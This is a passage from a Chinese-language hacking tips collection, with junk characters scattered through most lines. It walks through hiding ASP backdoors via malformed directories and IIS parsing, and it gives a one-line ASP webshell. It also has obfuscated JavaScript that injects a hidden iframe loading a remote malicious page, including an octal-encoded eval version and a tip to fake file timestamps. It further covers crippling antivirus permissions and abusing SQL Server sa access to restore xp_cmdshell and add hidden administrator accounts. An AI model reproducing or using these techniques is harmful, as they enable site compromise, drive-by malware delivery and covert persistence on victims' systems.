+ d9 j2 l9 K9 g执行后可以用AT命令查看新加的任务
1 ?. ~5 x' T2 X7 t0 W用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。' F6 o4 _ N& E q$ m9 I( x6 ?
& t N' u/ `2 v; y# v: Z' |
53、隐藏ASP后门的两种方法2 J$ }6 z' c) B
1、建立非标准目录:mkdir images..\" C0 S) g* G# M0 E3 G# M- ]
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
: p4 V2 S% Z' K% E通过web访问ASP木马:http://ip/images../news.asp?action=login
6 ^ k' o7 r$ [# ?. R, z如何删除非标准目录:rmdir images..\ /s
" `% _& f+ e+ Q1 M4 d2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
6 x# N S( x( X9 u# ]* Hmkdir programme.asp U2 d6 F2 y1 h/ H/ Q9 y
新建1.txt文件内容:<!--#include file=”12.jpg”-->
: y4 W `4 n, m3 h0 n. D新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件. u3 o/ { s) G
attrib +H +S programme.asp! |0 T G: R$ o1 I) v4 @
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ a w# l8 ^* a% H
2 q. \% p3 V+ f" r: ^" b B3 @9 ?54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
6 {" P9 p1 p4 ~$ s然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。5 Y' U1 J! L& Y3 M/ z* O
5 R/ c* A4 r( s7 g% U+ s55、JS隐蔽挂马! p$ c/ w% s0 d4 G" s' r2 F2 A
1.6 L3 J A! O' S9 b8 D d* K9 e
var tr4c3="<iframe src=ht";
0 J1 o% |2 y+ B- Gtr4c3 = tr4c3+"tp:/";: E7 `( d+ r' `
tr4c3 = tr4c3+"/ww";5 R6 y }0 ?9 l0 k* l$ l# f7 P9 w
tr4c3 = tr4c3+"w.tr4";
. V+ l( R, W# Q' Itr4c3 = tr4c3+"c3.com/inc/m";
' ^3 L- ]( L* K( t1 P, ]tr4c3 = tr4c3+"m.htm style="display:none"></i";
! U2 `/ L" Y% g! k Xtr4c3 =tr4c3+"frame>'";( B* \' n- D) ~ g4 Q. q) Y& v
document.write(tr4c3);
3 O( K+ R5 R% t5 ^/ l& ]& l8 A9 R, d避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ E% t" L$ q! }9 _: R- \4 e
( z& F0 ]3 r' q# P2.
O2 w, S5 j% b& H9 {9 {( a转换进制,然后用EVAL执行。如
. Y, \$ L, g8 W% zeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 u7 J8 [% L5 U8 P9 l
不过这个有点显眼。
2 y, B3 D1 {4 y7 _5 z1 R3.
5 p2 \) z2 H9 o; B; z7 N3 z1 Vdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
. W% N. w6 R% N1 l2 v# E- V( |最后一点,别忘了把文件的时间也修改下。
G( m3 \1 e5 O+ Y8 O
3 B5 j; X% G# C" f0 @56.3389终端入侵常用DOS命令( k1 V6 O- r+ t' O& Y, A
taskkill taskkill /PID 1248 /t
% D; x, A+ v! P5 P; o2 m; c- X; h. V5 f, U2 D& a3 @# y
tasklist 查进程
: g) h3 Q# `3 g m6 R
c0 L" Q# z: Q/ O1 Zcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
& \1 _3 G* l/ ]$ C$ j5 z/ Aiisreset /reboot
% x( w0 {/ B0 _. |% [6 ftsshutdn /reboot /delay:1 重起服务器
4 v) n3 J/ F' C L2 U
5 w1 w3 F1 c$ P$ {5 E, |logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
+ _& | w0 i, }2 n+ @- a$ m) i7 R8 L, D) x, a, {- |! K
query user 查看当前终端用户在线情况
) y2 I* [4 f0 P% o; w9 K6 q4 ], i' P; ?# L! ]8 W' Y J4 e" [
要显示有关所有会话使用的进程的信息,请键入:query process *( n4 l0 F. s1 t: M
& H% Y" `. K$ `& m; L" V+ c
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
9 ?# m* f' E/ ~5 R$ n4 o5 I
' y$ }6 x! G& j* m+ Y: b# \要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2& H% T" [% N5 X5 o# E) |
0 E2 D# f. _4 ?7 M' G. Y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" d: A7 e9 ~' e# \
s! }$ K! U1 t9 s7 Y( f命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 E+ _" w" Q& X+ M; m# P; R( J4 o! v! Q. E! m2 z4 T$ @/ A& D! E
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
, M- R& {9 a8 S
8 |: h8 b) w/ t% v( ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 ~' l, p' W7 s3 t8 }
2 `1 F$ m4 ?; ~3 M命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
, @6 A8 O0 U4 I8 B" I, n/ F+ L
8 @! W3 u* {4 |2 ^: b6 {% }& F6 D56、在地址栏或按Ctrl+O,输入:5 _2 ?+ ]2 M) \: L$ {
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;7 u- r' P/ A( t( Z
- e0 m( e' v9 Z6 q$ _ a源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% p* _+ z5 T9 Z5 b0 F( g7 G6 B) O1 s1 ~
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
5 W$ r6 A% n- x9 G0 O; T2 R用net localgroup administrators是可以看到管理组下,加了$的用户的。- E% B; w- C( L3 ^% L
; q6 ?4 v) T$ r58、 sa弱口令相关命令1 [+ O( v m/ r1 o9 c
: ]2 ], {; M% i
一.更改sa口令方法:2 f! l+ G* [: K6 g) D7 `4 ?: ]* X
用sql综合利用工具连接后,执行命令:2 r+ q: |, s( G5 O7 B" w
exec sp_password NULL,'20001001','sa'! Z4 a, h {6 F2 Y a
(提示:慎用!)
$ q( d' {! Z7 O" ~! \: T. {/ Y3 e) b' j; u. J, c
二.简单修补sa弱口令.0 X* K$ T' x1 `
4 M) ?" z7 Z _+ h) B3 p5 X方法1:查询分离器连接后执行:
* f, i+ f% U9 iif exists (select * from% j. ~+ Z: w$ W; N
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 l8 F& L7 i0 `! s- gOBJECTPROPERTY(id, N'IsExtendedProc') = 1) W( c: F( f3 b8 \- }9 `
6 Q* `2 o! P) N1 \6 t& I& Yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'* n f8 A+ b& K, g6 _
3 `6 }: `' j5 k' M4 L qGO
* o0 G, x+ |& f9 u5 D- H7 i
0 c) @5 m) ]# l然后按F5键命令执行完毕
& Y8 U; M2 Y: u8 T
% |* W2 k2 e& i# v. t0 s方法2:查询分离器连接后
0 F& c, Y( c; a* H7 P0 ~第一步执行:use master
' i1 E ~# i* H' L- r! b) m6 g3 E R8 c第二步执行:sp_dropextendedproc 'xp_cmdshell'! ^( q* E( P( E8 |
然后按F5键命令执行完毕
O& O1 T1 c1 C$ Z; A6 D& \9 b' T1 Y
9 x' ~. ?6 f& C3 v8 I6 W
三.常见情况恢复执行xp_cmdshell.$ c0 Z3 Q' _# @ I
7 v- u' J* |. G" R' ]" H# v; c1 `
C! B* O7 j; q7 g4 g u
1 未能找到存储过程'master..xpcmdshell'./ n3 L" | X' I; w
恢复方法:查询分离器连接后,* K# ^1 [/ v1 } S8 `' H9 l& B
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int- m+ L& ]4 Z( i4 Y' k
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( V3 b, e% ^% r4 K7 [
然后按F5键命令执行完毕
, y5 A/ J' n) C; R4 p5 I G% i
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)3 }3 {, ~9 D0 }0 b
恢复方法:查询分离器连接后,
- q# {2 l8 x5 H, G `第一步执行:sp_dropextendedproc "xp_cmdshell"/ [( D r1 I) g4 O; O
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# @- N! K+ B1 R+ A' B `( T然后按F5键命令执行完毕
. }+ F+ z, [$ v
5 h2 ]2 o* M; G- s3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ [; X( p1 Z: p
恢复方法:查询分离器连接后,. O4 u" H7 J+ s0 O; N! Z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 X9 j2 _' N5 S# v$ b& k) r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
, }& V7 Y5 c) z: t. n2 c然后按F5键命令执行完毕
3 R% {9 P' c6 ~. B% Y* |
9 F* l, ^1 P! k) A- _+ g* A U8 r* T四.终极方法.
8 e0 S W* f, J! H7 {# }如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:0 B3 g# q/ o, ^
查询分离器连接后,
6 Z- l/ |$ M4 h5 j9 k1 e2000servser系统:
2 ]: c! Y* j8 pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ ^9 s' p8 z$ F* o) {
0 [; V- m, c3 T5 j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ n( S4 z! m9 Q
9 l1 y( C% w% m D+ c0 ?$ y9 Axp或2003server系统:
& J; d; I) q0 ^
0 i; `* j8 J2 {, e3 m) n# Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
|3 X I* C0 y6 j" S: P, `$ M; e. l5 J/ x, m. U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'; x) X( B3 ?/ J' J: G- _
|